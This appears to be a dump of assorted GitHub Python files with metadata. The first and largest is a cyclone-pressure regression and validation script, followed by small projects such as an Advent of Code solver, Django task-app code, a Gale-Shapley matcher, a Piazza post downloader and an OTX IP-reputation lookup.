& (data['Longitude'][idx] <= 180.)\n filter3 = (data['rMax'][idx] >= 0.1)\n subsidx = np.nonzero(filter1 & filter2 & filter3)\n return data[subsidx]\n\ndef julianDays(datetime):\n jdays = np.array([float(dt.strftime(\"%j\")) + dt.hour/24. for dt in datetime])\n return jdays\n\ndef processFiles(path, basin):\n lon = np.array([])\n lat = np.array([])\n prs = np.array([])\n poci = np.array([])\n day = np.array([])\n for root, dirs, files in os.walk(path):\n if root.endswith(basin):\n for file in files:\n data = loadData(pjoin(root, file))\n if 'Status' in data.dtype.names:\n data = filterData(data)\n if 'Poci' in data.dtype.names:\n poci = np.append(poci, data['Poci'])\n prs = np.append(prs, data['Pressure'])\n lat = np.append(lat, data['Latitude'])\n lon = np.append(lon, data['Longitude'])\n day = np.append(day, julianDays(data['Datetime']))\n return poci, prs, lon, lat, day\n\ninputPath = \"C:\\\\WorkSpace\\\\data\\\\Raw\\\\best_tracks\"\nspoci, sprs, slon, slat, sdays = processFiles(inputPath, 'sh')\n\nscoords = np.array([sdays, slat, slon])\nncfile = \"C:\\\\WorkSpace\\\\tcrm\\\\MSLP\\\\slp.day.ltm.nc\"\nncobj = ncLoadFile(ncfile)\nslpunits = getattr(ncobj.variables['slp'], 'units')\nslpdata = ncGetData(ncobj, 'slp')\nspenv = interp3d(slpdata, scoords, scale=[365., 180., 360.], offset=[0., -90., 0.])\nspenv = convert(spenv, slpunits, 'hPa')\n\nsjp = sns.jointplot(spenv.compress(spoci!=0), spoci.compress(spoci!=0), kind='hex')\n\nsjp.set_axis_labels(r'$P_{ltm }$', r'$P_{oci}$')\n\npoci = spoci.compress(spoci!=0)\npenv = spenv.compress(spoci!=0)\ncp = sprs.compress(spoci!=0)\ndp = penv - cp\nlat = slat.compress(spoci!=0)\njday = sdays.compress(spoci!=0)\nprint(len(poci))\n\nax = sns.distplot(penv-poci, label=r\"$p_{ltm} - p_{oci}$\", kde_kws={\"label\":\"KDE\"}, \n fit=stats.lognorm, fit_kws={\"label\":\"Fitted lognormal\",\n \"color\":\"0.5\", \"linestyle\":\"--\"})\nax.set_xlabel(r\"$p_{ltm} - p_{oci}$ (hPa)\")\nax.set_ylabel(\"Probability\")\nax.legend()\nsns.despine()\n\nX = np.column_stack((penv, cp, cp*cp, lat*lat, np.cos(np.pi*2*jday/365)))\nX = sm.add_constant(X)\nmodel = sm.OLS(poci, X)\nresults = model.fit()\nprint(results.summary())\nprint('Parameters: ', results.params)\nprint('P-value: ', results.pvalues)\nprint('R-squared: ', results.rsquared)\nprint('T-values: ', results.tvalues)\n\nfig, (ax0, ax1) = plt.subplots(1,2)\nax = sns.distplot(results.resid, label=\"Resiuals\", kde_kws={'label':'KDE of residuals', 'linestyle':'--'}, ax=ax0)\npp = sm.ProbPlot(results.resid, stats.norm, fit=True)\npp.qqplot('Normal', 'Residuals', line='45', ax=ax1, color='gray', alpha=0.5)\nfig.tight_layout()\n\nfp = stats.norm.fit(results.resid,)#shape=np.mean(results.resid),scale=np.std(results.resid))\n\n\nx = np.linspace(-10, 10, 1000)\nprint(fp)\nprint(stats.mstats.normaltest(results.resid))\nprint(stats.shapiro(results.resid))\nax.plot(x, stats.norm.pdf(x, fp[0], fp[1]), label='Normal')\nax.legend(loc=2)\np = list(results.params)\np.append(fp[1])\nprint(p)\n\nnx = len(poci)\nind = np.random.choice(np.arange(nx), 10000, replace=True)\npenv0 = penv[ind]\ncp0 = cp[ind]\nlat0 = lat[ind]\njday0 = jday[ind]\n\npoci_model = p[0] + p[1]*penv0 + p[2]*cp0 +p[3]*cp0*cp0 + p[4]*lat0*lat0 + p[5]*np.sin(np.pi*2*jday0/365) + np.random.normal(scale=p[6], size=10000)\n\nfig, (ax0, ax1) = plt.subplots(1, 2, sharey=True)\n\nax0.scatter(penv0, poci_model, c=np.abs(lat0), \n cmap=sns.light_palette('blue', as_cmap=True), \n s=40, label='Model', alpha=0.25)\nax0.scatter(penv, poci, c='r', edgecolor='r', marker='+', \n 
s=50, label=\"Observations\")\n#ax.set_xlim(1005, 1020)\nax0.set_xlabel(r\"$P_{ltm }$ (hPa)\")\nax0.set_ylabel(r\"$P_{oci}$ (hPa)\")\n#ax.set_ylim(990, 1015)\nax0.legend(loc=3, frameon=True)\nax0.grid(True)\n\nax1.scatter(cp0, poci_model, c=np.abs(lat0), \n cmap=sns.light_palette('blue', as_cmap=True), \n s=40, label='Model', alpha=0.25)\nax1.scatter(cp, poci, c='r', edgecolor='r', marker='+', \n s=50, label=\"Observations\")\n\n#ax1.set_xlim(1005, 1020)\nax1.set_xlabel(r\"$P_{centre}$ (hPa)\")\n#ax1.set_ylim(980, 1015)\nax1.legend(loc=3, frameon=True)\nax1.grid(True)\nfig.tight_layout()\n\ndef bivariate_kde(x, y, bw='scott', gridsize=100, cut=3, clip=None):\n if isinstance(bw, string_types):\n bw_func = getattr(smnp.bandwidths, \"bw_\" + bw)\n x_bw = bw_func(x)\n y_bw = bw_func(y)\n bw = [x_bw, y_bw]\n elif np.isscalar(bw):\n bw = [bw, bw]\n\n if isinstance(x, pd.Series):\n x = x.values\n if isinstance(y, pd.Series):\n y = y.values\n\n kde = smnp.KDEMultivariate([x, y], \"cc\", bw)\n x_support = _kde_support(x, kde.bw[0], gridsize, cut, [x.min(), x.max()])# clip[0])\n y_support = _kde_support(y, kde.bw[1], gridsize, cut, [y.min(), y.max()])#clip[1])\n xx, yy = np.meshgrid(x_support, y_support)\n z = kde.pdf([xx.ravel(), yy.ravel()]).reshape(xx.shape)\n return xx, yy, z\n\ndef l2score(obs, model):\n return np.linalg.norm(obs - model)\n\nsns.set_style(\"darkgrid\")\nfig, (axes) = plt.subplots(2, 2, sharey=True)\n\nax0, ax1, ax2, ax3 = axes.flatten()\nlevs=np.arange(0.01, 0.11, 0.1)\nax = sns.kdeplot(penv, poci, cmap=\"Reds\", ax=ax0, kwargs={'levels':levs}, shade=True, shade_lowest=False)\nax = sns.kdeplot(penv0, poci_model, cmap=\"Blues\", ax=ax0, kwargs={'levels':levs})\nxx, yy, ope_poci = bivariate_kde(penv, poci)\nxx, yy, mpe_poci = bivariate_kde(penv0, poci_model)\nl2pe = l2score(ope_poci, mpe_poci)\n\nax = sns.kdeplot(cp, poci, cmap=\"Reds\", ax=ax1, kwargs={'levels':levs}, shade=True, shade_lowest=False)\nax = sns.kdeplot(cp0, poci_model, cmap=\"Blues\", ax=ax1, kwargs={'levels':levs})\nxx, yy, ocp_poci = bivariate_kde(cp, poci)\nxx, yy, mcp_poci = bivariate_kde(cp0, poci_model)\nl2cp = l2score(ocp_poci, mcp_poci)\n\nax = sns.kdeplot(lat, poci, cmap=\"Reds\", ax=ax2, kwargs={'levels':levs}, shade=True, shade_lowest=False)\nax = sns.kdeplot(lat0, poci_model, cmap=\"Blues\", ax=ax2, kwargs={'levels':levs})\nxx, yy, olat_poci = bivariate_kde(lat, poci)\nxx, yy, mlat_poci = bivariate_kde(lat0, poci_model)\nl2lat = l2score(olat_poci, mlat_poci)\n\nax = sns.kdeplot(jday, poci, cmap=\"Reds\", ax=ax3, kwargs={'levels':levs}, shade=True, shade_lowest=False)\nax = sns.kdeplot(jday0, poci_model, cmap=\"Blues\", ax=ax3, kwargs={'levels':levs})\nxx, yy, ojday_poci = bivariate_kde(jday, poci)\nxx, yy, mjday_poci = bivariate_kde(jday0, poci_model)\nl2jday = l2score(ojday_poci, mjday_poci)\n\nred = sns.color_palette(\"Reds\")[-1]\nblue = sns.color_palette(\"Blues\")[-1]\nax0.text(0.1, 0.1, \"Observed\", color=red, transform=ax0.transAxes)\nax0.text(0.1, 0.05, \"Model\", color=blue, transform=ax0.transAxes)\nax3.text(0.8, 0.05, r\"$l_2=${0:.3f}\".format(l2pe), transform=ax0.transAxes)\nax1.text(0.1, 0.1, \"Observed\", color=red, transform=ax1.transAxes)\nax1.text(0.1, 0.05, \"Model\", color=blue, transform=ax1.transAxes)\nax3.text(0.8, 0.05, r\"$l_2=${0:.3f}\".format(l2cp), transform=ax1.transAxes)\nax2.text(0.1, 0.1, \"Observed\", color=red, transform=ax2.transAxes)\nax2.text(0.1, 0.05, \"Model\", color=blue, transform=ax2.transAxes)\nax3.text(0.8, 0.05, r\"$l_2=${0:.3f}\".format(l2lat), 
transform=ax2.transAxes)\nax3.text(0.1, 0.1, \"Observed\", color=red, transform=ax3.transAxes)\nax3.text(0.1, 0.05, \"Model\", color=blue, transform=ax3.transAxes)\nax3.text(0.8, 0.05, r\"$l_2=${0:.3f}\".format(l2jday), transform=ax3.transAxes)\n\nax0.set_ylabel(r\"$P_{oci}$ (hPa)\")\nax0.set_xlabel(r\"$P_{ltm}$ (hPa)\")\nax1.set_xlabel(r\"$P_{centre}$ (hPa)\")\nax2.set_ylabel(r\"$P_{oci}$ (hPa)\")\nax2.set_xlabel(\"Latitude\")\nax3.set_xlabel(\"Day of year\")\nax3.set_xlim((0, 365))\nax0.grid(True)\nax1.grid(True)\nax2.grid(True)\nax3.grid(True)\n\nax0.text(0.1, 0.9, \"(a)\", ha='center', va='center', transform=ax0.transAxes)\nax1.text(0.1, 0.9, \"(b)\", ha='center', va='center', transform=ax1.transAxes)\nax2.text(0.1, 0.9, \"(c)\", ha='center', va='center', transform=ax2.transAxes)\nax3.text(0.1, 0.9, \"(d)\", ha='center', va='center', transform=ax3.transAxes)\nfig.tight_layout()\n\nimport logging\nimport sys\n\nLOG = logging.getLogger(__name__)\n\ndef getPoci(penv, pcentre, lat, jdays, eps,\n            coeffs=[2324.1564738613392, -0.6539853183796136,\n                    -1.3984456535888878, 0.00074072928008818927,\n                    0.0044469231429346088, -1.4337623534206905]):\n    \"\"\"\n    Calculate a modified pressure for the outermost closed isobar, based\n    on a model of daily long-term mean SLP values, central pressure,\n    latitude and day of year.\n\n    :param penv: environmental pressure estimate (from long term mean pressure\n                 dataset, hPa).\n    :param pcentre: Central pressure of storm (hPa).\n    :param lat: Latitude of storm (degrees).\n    :param jdays: Julian day (day of year).\n    :param eps: random variate. Retained as a constant for a single storm.\n\n    :returns: Revised estimate for the pressure of outermost closed isobar.\n    \"\"\"\n\n    if len(coeffs) < 6:\n        LOG.warning(\"Insufficient coefficients for poci calculation\")\n        LOG.warning(\"Using default values\")\n        coeffs=[2324.1564738613392, -0.6539853183796136,\n                -1.3984456535888878, 0.00074072928008818927,\n                0.0044469231429346088, -1.4337623534206905]\n\n    if isinstance(penv, (np.ndarray, list)) and isinstance(pcentre, (np.ndarray, list)) and isinstance(lat, (np.ndarray, list)) and isinstance(jdays, (np.ndarray, list)):\n        assert len(penv) == len(pcentre)\n        assert len(penv) == len(lat)\n        assert len(penv) == len(jdays)\n\n    poci_model = coeffs[0] + coeffs[1]*penv + coeffs[2]*pcentre + coeffs[3]*pcentre*pcentre + coeffs[4]*lat*lat + coeffs[5]*np.sin(np.pi*2*jdays/365) + eps\n\n    nvidx = np.where(pcentre == sys.maxsize)\n    poci_model[nvidx] = sys.maxsize\n    return poci_model\n\ntest_pcentre = np.array([920, 920, sys.maxsize, 920, 1010])\ntest_penv = np.array([1000, 1000, 1000, 1000, 1000])\ntest_lat = np.array([-10, -9, -8, -7, -7])\ntest_jday = np.array([311,312,313,314, 314])\neps = np.random.normal(0,scale=2.5717)\n\npp = getPoci(test_penv, test_pcentre, test_lat, test_jday, eps)\nprint(pp)
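\n\n# Spot check (added, illustrative): with penv=1000 hPa, pcentre=950 hPa,\n# lat=-15, jday=1 and eps=0, the fitted coefficients above give roughly\n# 2324.156 - 653.985 - 1328.523 + 668.508 + 1.001 - 0.025, i.e. about 1011.1 hPa.\n\n\n\n","repo_name":"mixmikmic/GH_code_analysis","sub_path":"python/Validating environmental pressure values.py","file_name":"Validating environmental pressure values.py","file_ext":"py","file_size_in_byte":14393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"23201708193","text":"#!/usr/bin/env python3.11\n\nfrom aochelper import *\nfrom z3 import If, Ints, Solver, sat\n\ndef solve(p2=4000000, p1=2000000):\n    S = set()\n    B = set()\n    x, y = Ints('x y')\n    s = Solver()\n    s.add(0 <= x)\n    s.add(x <= p2)\n    s.add(0 <= y)\n    s.add(y <= p2)\n    Zabs = lambda x: If(x < 0, -x, x)\n    for line in open('15.txt').read().splitlines():\n        sx, sy, bx, by = ints(line)\n        dist = abs(sx - bx) + abs(sy - by)\n        lim = dist - 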
abs(sy - p1)\n        if by == p1:\n            B.add(bx)\n        for sensor in range(sx - lim, sx + lim + 1):\n            S.add(sensor)\n        s.add(Zabs(x - sx) + Zabs(y - sy) > dist)\n\n    assert s.check() == sat\n    m = s.model()\n    return len(S-B), m[x].as_long() * p2 + m[y].as_long()\n\nprint(*solve())\n","repo_name":"llyyr/aoc-2022","sub_path":"15.py","file_name":"15.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"22640337569","text":"# this is a script for playing with python\r\n\r\n# Assignment and math\r\na = 0\r\nb = 2\r\nc = a + b\r\nprint(c)\r\n\r\n\r\n# if else\r\na = 20\r\nif a >= 22:\r\n    print(\"if\")\r\nelif a >= 21:\r\n    print(\"elif\")\r\nelse:\r\n    print(\"else\")\r\n\r\n# Function\r\ndef someFunction(a,b):\r\n\tc = a + b\r\n\tprint(c)\r\nsomeFunction(a,b)\r\n\r\n# For Loop\r\nfor i in range(1,3):\r\n\tprint(i)\r\n\r\n# While Loop\r\na = 1\r\nwhile a < 10:\r\n\tprint(a)\r\n\ta+=1\r\n\r\n# Strings\r\nmyString = \"b;alfkjdbxdklsjfwiojx\"\r\nprint(type(myString))\r\nnum = myString.count('x')\r\nprint(num)\r\nprint(myString[2:3])\r\n\r\n# lists\r\n# list = [1,2,3,4]\r\n# print(list[1])\r\n\r\n# for i in list:\r\n\t# print(i)\r\n\r\n# list.reverse()\r\n# print(list)\r\n\r\n# tuples\r\nmyTuple = (1,2,3)\r\nmyList = list(myTuple)\r\nmyList.append(4)\r\nprint(myList)\r\n\r\n# dictionaries\r\nmyExample = {'something': 2, 'someElse': 20}\r\nprint(myExample['someElse'])\r\nmyExample['newItem'] = 400\r\nfor i in myExample:\r\n\tprint(myExample[i])\r\n\r\n# formatting\r\nprint('The total is %f' % 123.435)\r\nprint('The total is %.2f' % 123.435)\r\nmstring = \"a;sldjfie;wajf;efj\"\r\nprint('%s' % mstring)\r\n\r\n# try/except\r\nvar1 = '1'\r\ntry:\r\n\tvar2 = var1 + 1 # won't work: cannot add str and int\r\nexcept:\r\n\tvar2 = int(var1) + 1\r\nprint(var2)\r\n\r\n\r\n# classes\r\nclass Calculator(object):\r\n\tdef __init__ (self):\r\n\t\tself.current = 0\r\n\tdef add(self, amount):\r\n\t\tself.current += amount\r\n\tdef getCurrent(self):\r\n\t\treturn self.current\r\n\r\n","repo_name":"jaschrass/Playing-with-Python","sub_path":"trial.py","file_name":"trial.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"1027901096","text":"# src/main/base/urls.py\n# Django modules\nfrom django.urls import path\nfrom .views import TaskDetail, Tasks, CreateTask, EditTask, DeleteTask, Login, RegistrationPage\nfrom django.contrib.auth.views import LogoutView\n\nurlpatterns = [\n    path('', Tasks.as_view(), name='tasks'),\n    path('login/', Login.as_view(), name='login'),\n    path('register/', RegistrationPage.as_view(), name='register'),\n    path('logout/', LogoutView.as_view(next_page='login'), name='logout'),\n    path('task/<int:pk>/', TaskDetail.as_view(), name='task'),\n    path('create-task/', CreateTask.as_view(), name='create-task'),\n    path('edit-task/<int:pk>/', EditTask.as_view(), name='edit-task'),\n    path('delete-task/<int:pk>/', DeleteTask.as_view(), name='delete-task'),\n]\n
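\n# Note (added): the detail routes above capture the task's primary key with\n# the <int:pk> path converter (the usual Django convention for pk-based\n# class-based views), so -- assuming this urlconf is mounted at the site\n# root -- reverse('task', args=[3]) resolves to '/task/3/'.\n","repo_name":"JasoSalgado/python-projects","sub_path":"task-manager/src/main/base/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"26520350527","text":"import json\nimport os\nimport time\nimport random\n\ntry:\n    from types import SimpleNamespace as Namespace\nexcept ImportError:\n    # Python 2.x fallback\n    pass #from types import 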
SimpleNamespace\n\nfrom piazza_api.piazza import Piazza as pz\nfrom piazza_api.piazza import PiazzaRPC as rpc\n\nclass Piazza(object):\n def __init__(self, network, creds):\n self.nid = network\n self.creds = creds\n self.rpc = rpc(self.nid)\n self.rpc.user_login(self.creds['email'], self.creds['pwd'])\n self.course = pz(self.rpc)\n self.network = self.course.network(self.nid)\n\n def get_user_profile(self):\n prof = self.course.get_user_profile()\n return prof\n\n def get_user_profiles(self):\n users = self.rpc.get_all_users()\n profs = self.rpc.get_users(users)\n return profs\n\n def get_stats(self):\n data = self.rpc.get_stats(self.nid)\n return data\n\n def iter_all_posts(self):\n it = self.network.iter_all_posts(limit=10)\n return it\n\n def get_post(self, cid):\n p = self.network.get_post(cid)\n return p\n\n def get_all(self, out):\n it = self.network.iter_all_posts()\n c = 0\n\n if not os.path.exists(out):\n os.mkdir(out)\n\n for post in it:\n fname = os.path.join(out, 'cid_{}.json'.format(c))\n with open(fname, 'w') as d:\n json.dump(post, d, indent=4, sort_keys=True)\n c += 1\n time.sleep(2 + random.uniform(1.1, 5.1))","repo_name":"corytodd/rendezvous","sub_path":"tools/hacking/piazza.py","file_name":"piazza.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"} +{"seq_id":"7147341592","text":"import random # Using random module for choosing random free man from the list free_man\nfrom typing import Dict, List # Using typing module to define values of the dictionary\n\n\ndef gs_algorithm(preferences_men, preferences_women):\n print(\"\\nGale-Shapley algorithm.\")\n matching: Dict[str, str] = {} # Matching S_S is an empty dictionary\n\n # All men and women are free: fact that women are free ain't relevant,\n # fact that no man hadn't propose any woman is relevant\n free_men: List[str] = []\n proposals: Dict[str, int] = {}\n for man in preferences_men.keys():\n free_men.append(man)\n proposals[man] = 0 # Index of the first woman to propose, will increase during the execution of while loop\n\n first_man = list(preferences_men.keys())[0]\n out_of_range_index = len(preferences_men[first_man])\n print(f\"Out of range index of woman to propose for men: {out_of_range_index}\")\n iterations_counter = 1 # Not necessary, useful for tracking actions in each iteration of while loop\n not_propose_to_all_women = all(proposals[man] < out_of_range_index for man in free_men)\n print(\"\\nExecution of the while loop:\")\n while free_men and not_propose_to_all_women:\n print(f\"Iteration number {iterations_counter}:\")\n potential_fiance = random.choice(free_men) # Randomly chosen free man\n woman_index = proposals[potential_fiance] # Index of woman to propose in this iteration\n proposals[potential_fiance] += 1 # Index of woman to propose in next iteration for man\n potential_fiance_preferences = preferences_men[potential_fiance]\n print(f\"Randomly chosen free man is {potential_fiance}, \"\n f\"his list of preferences: {potential_fiance_preferences}.\")\n woman_to_propose = potential_fiance_preferences[woman_index]\n print(f\"Man {potential_fiance} is proposing woman {woman_to_propose} from index {woman_index}:\")\n\n if woman_to_propose not in matching.values(): # Checking if woman is single\n matching[potential_fiance] = woman_to_propose\n print(f\"\\tThis is first proposal to woman {woman_to_propose}.\")\n print(f\"\\tAdding couple ({potential_fiance}, {woman_to_propose}) to a matching.\")\n 
print(f\"\\tMatching after the update: \\n\\t{matching}.\")\n free_men.remove(potential_fiance)\n else: # Woman ain't single; fetching current fiance\n current_fiance = list(matching.keys())[list(matching.values()).index(woman_to_propose)]\n print(f\"\\tWoman {woman_to_propose} is in the matching with a fiance {current_fiance}:\")\n woman_to_propose_pref = preferences_women[woman_to_propose]\n print(f\"\\tWoman {woman_to_propose}'s preferences: {woman_to_propose_pref}.\")\n\n # Attention: index of lists; using < not >;\n # first in the list (index is 0) is the most preferred\n current_fiance_index = woman_to_propose_pref.index(current_fiance)\n potential_fiance_index = woman_to_propose_pref.index(potential_fiance)\n\n if current_fiance_index < potential_fiance_index:\n print(f\"\\tWoman {woman_to_propose} prefers current fiance {current_fiance} \"\n f\"more than potential fiance {potential_fiance}.\")\n print(f\"\\tMatching doesn't change in this iteration.\")\n else:\n print(f\"\\tWoman {woman_to_propose} prefers potential fiance {potential_fiance} \"\n f\"more than current fiance {current_fiance}.\")\n print(f\"\\tCurrent matching: \\n\\t{matching}.\")\n matching.pop(current_fiance) # Pop couple (current_fiance, woman_to_propose)\n print(f\"\\tRemoving couple ({current_fiance}, {woman_to_propose}) from the matching.\")\n matching[potential_fiance] = woman_to_propose\n print(f\"\\tAdding couple ({potential_fiance}, {woman_to_propose}) to matching.\")\n print(f\"\\tMatching after the update: \\n\\t\\t{matching}.\")\n free_men.remove(potential_fiance) # Potential fiance ain't free anymore\n print(f\"\\tMan {potential_fiance} is not free anymore.\")\n free_men.append(current_fiance) # Current fiance is free now\n print(f\"\\tMan {current_fiance} is free now.\")\n\n if free_men:\n print(f\"Free men are: {free_men}.\")\n else:\n print(\"There are no free men anymore.\")\n\n iterations_counter += 1\n not_propose_to_all_women = all(proposals[men] < out_of_range_index for men in free_men)\n print(\"\\t\")\n\n print(\"The result of Gale-Shapley algorithm is stable matching S: \\n{}\".format(matching))\n print(\"Sorted stable matching:\")\n for i in sorted(matching.keys()):\n print(f\"\\t({i}, {matching[i]})\")\n print(\"End of Gale-Shapley algorithm.\")\n return matching\n\n\n# Input data: men, women and their preferences;\n# structure: dictionary (unordered and changeable)\n\n# Stable matching problem from the thesis, Example 2.2.8.\n# Output stored in gs_example_1.txt\nmen_first: Dict[str, List[str]] = {\n 'm1': ['w1', 'w3', 'w2', 'w4'],\n 'm2': ['w3', 'w4', 'w1', 'w2'],\n 'm3': ['w4', 'w2', 'w3', 'w1'],\n 'm4': ['w4', 'w2', 'w1', 'w3']\n}\n\nwomen_first: Dict[str, List[str]] = {\n 'w1': ['m2', 'm4', 'm3', 'm1'],\n 'w2': ['m4', 'm3', 'm1', 'm2'],\n 'w3': ['m1', 'm4', 'm2', 'm3'],\n 'w4': ['m4', 'm1', 'm2', 'm3']\n}\n\n# gs_algorithm(men_first, women_first)\n\n\n# Stable matching problem from the article The Stable Matching Problem, D.G. McVitie and L.B. 
Wilson\n# Reference [6] in the thesis\n# Output stored in gs_example_2.txt\nmen_second: Dict[str, List[str]] = {\n 'm1': ['w5', 'w7', 'w1', 'w2', 'w6', 'w8', 'w4', 'w3'],\n 'm2': ['w2', 'w3', 'w7', 'w5', 'w4', 'w1', 'w8', 'w6'],\n 'm3': ['w8', 'w5', 'w1', 'w4', 'w6', 'w2', 'w3', 'w7'],\n 'm4': ['w3', 'w2', 'w7', 'w4', 'w1', 'w6', 'w8', 'w5'],\n 'm5': ['w7', 'w2', 'w5', 'w1', 'w3', 'w6', 'w8', 'w4'],\n 'm6': ['w1', 'w6', 'w7', 'w5', 'w8', 'w4', 'w2', 'w3'],\n 'm7': ['w2', 'w5', 'w7', 'w6', 'w3', 'w4', 'w8', 'w1'],\n 'm8': ['w3', 'w8', 'w4', 'w5', 'w7', 'w2', 'w6', 'w1']\n}\n\nwomen_second: Dict[str, List[str]] = {\n 'w1': ['m5', 'm3', 'm7', 'm6', 'm1', 'm2', 'm8', 'm4'],\n 'w2': ['m8', 'm6', 'm3', 'm5', 'm7', 'm2', 'm1', 'm4'],\n 'w3': ['m1', 'm5', 'm6', 'm2', 'm4', 'm8', 'm7', 'm3'],\n 'w4': ['m8', 'm7', 'm3', 'm2', 'm4', 'm1', 'm5', 'm6'],\n 'w5': ['m6', 'm4', 'm7', 'm3', 'm8', 'm1', 'm2', 'm5'],\n 'w6': ['m2', 'm8', 'm5', 'm4', 'm6', 'm3', 'm7', 'm1'],\n 'w7': ['m7', 'm5', 'm2', 'm1', 'm8', 'm6', 'm4', 'm3'],\n 'w8': ['m7', 'm4', 'm1', 'm5', 'm2', 'm3', 'm6', 'm8']\n}\n\n# gs_algorithm(men_second, women_second)\n","repo_name":"KristinaUdovicic/master_thesis","sub_path":"algorithm_detailed/gale_shapley_algorithm.py","file_name":"gale_shapley_algorithm.py","file_ext":"py","file_size_in_byte":6871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"32715296624","text":"import requests\nimport json\n\ndef getIPrepdata(ip):\n apiiplist = \"https://otx.alienvault.com/api/v1/indicator/IPv4/\" + str(ip) + \"/reputation\"\n iplist = requests.get(apiiplist)\n ipdata = iplist.json()\n return ipdata\n\ndef dedupeList(x):\n return list(dict.fromkeys(x))\n\ndef getinput():\n ip = '184.168.221.57'\n x = input(\"What IP do you want to research?\\nIP \" + ip + \" will be used if left blank.\\n->\")\n if x != '':\n ip = str(x)\n return(ip)\n\ndef run():\n ip = getinput()\n global ipresult\n ipresult = getIPrepdata(ip) \n list = getIPrep(ip)\n returnList(list)\n\ndef returnList(items):\n for i in items:\n print(i)\n\ndef getIPrep(ip):\n lines = []\n dedupe = []\n if ipresult[\"reputation\"]:\n for records in (ipresult[\"reputation\"][\"activities\"]):\n name = records[\"name\"]\n fd = records.get(\"first_date\")\n ld = records.get(\"last_date\")\n record = ip + \" known for \" + name\n lines.append(record)\n else:\n lines.append(\"IP has no reputation data for bad activity.\")\n for x in lines:\n if x not in dedupe:\n dedupe.append(x)\n return dedupe\n\n\n\nrun()\n","repo_name":"kkasberg/OTXIPLookup","sub_path":"lookupIP.py","file_name":"lookupIP.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"20463000363","text":"def sumnum(num1, num2, k):\n sum = 0\n for i in range(num1, num2+1):\n sum = sum + i**k\n return sum\n \ndef mainsum():\n a = 50\n b = 150\n k = 2\n print(\"Sum of %d power of numbers from %d to %d = %d\" % (k,a,b, sumnum(a,b,k)))\n\n\nmainsum()\n\n","repo_name":"JacklineKigombe/Jenga-School-Lecture-11-assignment","sub_path":"Lecture11_assgn3.py","file_name":"Lecture11_assgn3.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"28378973587","text":"import flywithwings\r\nimport nowings\r\nimport quack\r\nimport noquack\r\nimport squeak\r\n\r\nobj1 = flywithwings.flywithwings\r\nobj2 = nowings.nowings\r\nobj3 = quack.quack\r\nobj4 = 
noquack.noquack\r\nobj5 = squeak.squeak\r\n\r\nval = \" \"\r\nprint(\"select a duck\")\r\nprint(\"for Mallard Duck write 1\")\r\nprint(\"for Rubber Duck write 2\")\r\nprint(\"for Redhead Duck write 3\") \r\nprint(\"for Decoy Duck write 4\")\r\nval = input(\"number -\")\r\nif val == \"1\":\r\n print(\"This is a Mallard Duck.\")\r\n obj1.flywithwings()\r\n obj3.quack()\r\nelif val == \"2\":\r\n print(\"This is a Rubber Duck.\")\r\n obj2.nowings()\r\n obj5.squeak()\r\nelif val == \"3\":\r\n print(\"This is a Readhead Duck.\")\r\n obj1.flywithwings()\r\n obj4.noquack()\r\nelif val == \"4\":\r\n print(\"This is a Decoy Duck.\")\r\n obj1.flywithwings()\r\n obj3.quack()","repo_name":"ayushsharma1211/Lab_11_-e22mcag0012-","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"29559800357","text":"get_ipython().magic('load_ext autoreload')\nget_ipython().magic('autoreload 2')\n\nimport os; os.chdir('..')\nimport models\nimport orca\nfrom urbansim.maps import dframe_explorer\n\n# Run some model steps\norca.run([\n \"neighborhood_vars\",\n \"rsh_simulate\",\n \"rrh_simulate\", \n], iter_vars=[2010])\n\nd = {tbl: orca.get_table(tbl).to_frame() for tbl in \n ['buildings', 'residential_units', 'households']}\n\ndframe_explorer.start(d, \n center=[37.7792, -122.2191],\n zoom=11,\n shape_json='data/zones.json',\n geom_name='ZONE_ID', # from JSON file\n join_name='zone_id', # from data frames\n precision=2)\n\n\n\n","repo_name":"mixmikmic/GH_code_analysis","sub_path":"python/exploration.py","file_name":"exploration.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"34794080210","text":"def ePrimo(num):\r\n div,count=2,0\r\n\r\n while div<=num/2 and count==0:\r\n if num%div==0:\r\n count+=1\r\n else:\r\n div+=1\r\n if count==0:\r\n return True \r\n else:\r\n return False\r\n\r\ntesto=open(\"./testo.txt\",\"w\")\r\nnum,nNumPrimi=2,0\r\nwhile(nNumPrimi <=100):\r\n if((ePrimo(num))):\r\n testo.write(str(num) +\"\\n\")\r\n nNumPrimi+=1\r\n num+=1","repo_name":"MicheleMolineri/4A_ROB_Sistemi_E_Reti-","sub_path":"Pitone/EsPitone/es033(numeriPrimiFile).py","file_name":"es033(numeriPrimiFile).py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"75193654189","text":"from kpi_app.models import KpiDevice, KpiMessage, KpiMessageEquationResult, KpiInformation\nfrom rest_framework import serializers\n\n\nclass KpiDeviceSerializer(serializers.ModelSerializer):\n class Meta:\n model = KpiDevice\n fields = ['asset_id', 'kpi_id']\n\n\nclass KpiInformationSerializer(serializers.ModelSerializer):\n assets = serializers.SlugRelatedField(many=True, read_only=True, slug_field='asset_id')\n\n class Meta:\n model = KpiInformation\n fields = \"__all__\"\n\n\nclass KpiMessageEquationResultSerilizer(serializers.ModelSerializer):\n class Meta:\n model = KpiMessageEquationResult\n fields = 